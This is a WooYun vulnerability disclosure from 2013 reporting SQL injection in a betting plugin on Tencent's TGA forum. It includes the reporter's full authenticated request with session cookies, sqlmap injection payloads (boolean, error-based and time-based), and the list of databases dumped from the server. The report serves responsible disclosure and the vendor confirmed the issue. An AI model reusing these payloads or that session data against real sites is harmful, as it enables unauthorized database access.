当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-045061

漏洞标题:腾讯游戏竞技平台TGA某站注入

相关厂商:腾讯

漏洞作者: if、so

提交时间:2013-12-06 16:02

修复时间:2014-01-20 16:03

公开时间:2014-01-20 16:03

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-12-06: 细节已通知厂商并且等待厂商处理中
2013-12-06: 厂商已经确认,细节仅向厂商公开
2013-12-16: 细节向核心白帽子及相关领域专家公开
2013-12-26: 细节向普通白帽子公开
2014-01-05: 细节向实习白帽子公开
2014-01-20: 细节向公众公开

简要描述:

腾讯游戏竞技平台TGA某站注入

详细说明:

问题出现在TGA的bbs,http://bbs.tga.plu.cn。论坛有个竞猜插件,存在sql注入。

QQ截图20131205213455.png

,加个单引号,报错了,

QQ截图20131205213556.png

。直接放入sqlmap跑好了。由于是bbs,要登录
cookie

GET /plugin.php?id=tgabet:official&view=bet&gid=324 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: bbs.tga.plu.cn
Cookie: pgv_si=s3218769920; BAIDU_CLB_REFER=http%3A%2F%2Ftga.qq.com%2F; pgv_info=ssid=s826767176&ssi=s445771245; pgv_pvi=9775746048; p1u_id=be62972e0e3b14f5a5d3c44cb5e293ffe4487a31d3160196cccd62db03a094322f85c175a90bd6e6; PHPSESSID=a024bc65cbbf4b5ff8fc1d5f8b6f1a73; pgv_info=ssid=s826767176&ssi=s445771245; Hm_lpvt_1cbb74d806aabe66aa1929ede5b12aa1=1386245195; CNZZDATA2171795=cnzz_eid%3D1211801768-1386089767-http%253A%252F%252Ftga.plu.cn%26ntime%3D1386244548%26cnzz_a%3D2%26sin%3Dhttp%253A%252F%252Fbbs.tga.plu.cn%252Fplugin.php%253Fid%253Dtgabet%253Aofficial%2526view%253Dbet%2526gid%253D324%26ltime%3D1386238063392%26rtime%3D2; CNZZDATA4990323=cnzz_eid%3D836961960-1386089767-http%253A%252F%252Ftga.plu.cn%26ntime%3D1386244548%26cnzz_a%3D2%26sin%3Dhttp%253A%252F%252Fbbs.tga.plu.cn%252Fplugin.php%253Fid%253Dtgabet%253Aofficial%2526view%253Dbet%2526gid%253D324%26ltime%3D1386238063462%26rtime%3D2; CNZZDATA5261713=cnzz_eid%3D925025665-1386089767-http%253A%252F%252Ftga.plu.cn%26ntime%3D1386244548%26cnzz_a%3D2%26sin%3Dhttp%253A%252F%252Fbbs.tga.plu.cn%252Fplugin.php%253Fid%253Dtgabet%253Aofficial%2526view%253Dbet%2526gid%253D324%26ltime%3D1386238063488%26rtime%3D2; CNZZDATA5405344=cnzz_eid%3D212189416-1386089767-http%253A%252F%252Ftga.plu.cn%26ntime%3D1386244548%26cnzz_a%3D2%26sin%3Dhttp%253A%252F%252Fbbs.tga.plu.cn%252Fplugin.php%253Fid%253Dtgabet%253Aofficial%2526view%253Dbet%2526gid%253D324%26ltime%3D1386238063513%26rtime%3D2; ts_refer=bbs.tga.plu.cn/plugin.php; pgv_pvid=668465096; ts_uid=5735968957; Hm_lvt_1cbb74d806aabe66aa1929ede5b12aa1=1386171235,1386171240,1386238064,1386244548; ts_last=tga.plu.cn/; CNZZDATA2171795=cnzz_eid%3D1211801768-1386089767-http%253A%252F%252Ftga.plu.cn%26ntime%3D1386244548%26cnzz_a%3D3%26ltime%3D1386238063392%26rtime%3D2; CNZZDATA4990323=cnzz_eid%3D836961960-1386089767-http%253A%252F%252Ftga.plu.cn%26ntime%3D1386244548%26cnzz_a%3D3%26ltime%3D1386238063462%26rtime%3D2; CNZZDATA5111507=cnzz_eid%3D1620167765-1386244570-http%253A%252F%252Fbbs.tga.plu.cn%26ntime%3D1386244570%26cnzz_a%3D19%26ltime%3D1386244570624; CNZZDATA5261713=cnzz_eid%3D925025665-1386089767-http%253A%252F%252Ftga.plu.cn%26ntime%3D1386244548%26cnzz_a%3D3%26ltime%3D1386238063488%26rtime%3D2; tjpctrl=1386246377664; y0XB_f66b_saltkey=T9ZjZj62; y0XB_f66b_lastvisit=1386241603; y0XB_f66b_sid=kOONqn; y0XB_f66b_lastact=1386246274%09forum.php%09; y0XB_f66b_ulastactivity=51dfDecyxFVPI0ZsLPihV05CRfMueMfuoAl3iMeyA0D4wk1J2LMI; y0XB_f66b_auth=573aACXrH%2BOm2%2BX2xu%2FQ8WvKvA%2F7zooCXa4gcakMqlCbOd4STI8UM%2FVtEPGp8Teo9bcIV%2Bp5G9KeHkAPamtmyxF2fqIN; y0XB_f66b_lastcheckfeed=2232996%7C1386245396; y0XB_f66b_security_cookiereport=ae31aahIldqhRDHjjWZ%2BvvrFt%2FjcsXg8E6fa4rzFCj2IpTPWbz3Q; y0XB_f66b_nofavfid=1; y0XB_f66b_onlineusernum=528; y0XB_f66b_sendmail=1

,然后-r cookie.txt就能跑出数据。

Place: GET
Parameter: gid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=tgabet:official&view=bet&gid=324 AND 2667=2667
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=tgabet:official&view=bet&gid=324 AND (SELECT 7558 FROM(SELECT COUNT(*),CONCAT(0x3a7876763a,(SELECT (CASE WHEN (7558=7558) THEN 1 ELSE 0 END)),0x3a6b61733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=tgabet:official&view=bet&gid=324 AND SLEEP(5)
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: gid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=tgabet:official&view=bet&gid=324 AND 2667=2667
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=tgabet:official&view=bet&gid=324 AND (SELECT 7558 FROM(SELECT COUNT(*),CONCAT(0x3a7876763a,(SELECT (CASE WHEN (7558=7558) THEN 1 ELSE 0 END)),0x3a6b61733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=tgabet:official&view=bet&gid=324 AND SLEEP(5)
---
available databases [9]:
[*] AdCount
[*] AppStore
[*] information_schema
[*] mysql
[*] performance_schema
[*] PLU_Bak
[*] PLU_Jobs
[*] PLUHome
[*] ucbbs

,权限还不小

QQ截图20131205214333.png

不知道能不能写shell,反正sqlmap不行。感觉tga是外包给plu做的。

漏洞证明:

Place: GET
Parameter: gid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=tgabet:official&view=bet&gid=324 AND 2667=2667
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=tgabet:official&view=bet&gid=324 AND (SELECT 7558 FROM(SELECT COUNT(*),CONCAT(0x3a7876763a,(SELECT (CASE WHEN (7558=7558) THEN 1 ELSE 0 END)),0x3a6b61733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=tgabet:official&view=bet&gid=324 AND SLEEP(5)
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: gid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=tgabet:official&view=bet&gid=324 AND 2667=2667
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=tgabet:official&view=bet&gid=324 AND (SELECT 7558 FROM(SELECT COUNT(*),CONCAT(0x3a7876763a,(SELECT (CASE WHEN (7558=7558) THEN 1 ELSE 0 END)),0x3a6b61733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=tgabet:official&view=bet&gid=324 AND SLEEP(5)
---
available databases [9]:
[*] AdCount
[*] AppStore
[*] information_schema
[*] mysql
[*] performance_schema
[*] PLU_Bak
[*] PLU_Jobs
[*] PLUHome
[*] ucbbs

,权限还不小

QQ截图20131205214333.png

修复方案:

插件处

版权声明:转载请注明来源 if、so@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2013-12-06 17:12

厂商回复:

非常感谢您的报告,经过确认此问题为腾讯合作伙伴的业务,我们已经通知相关单位,问题已着手处理。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

暂无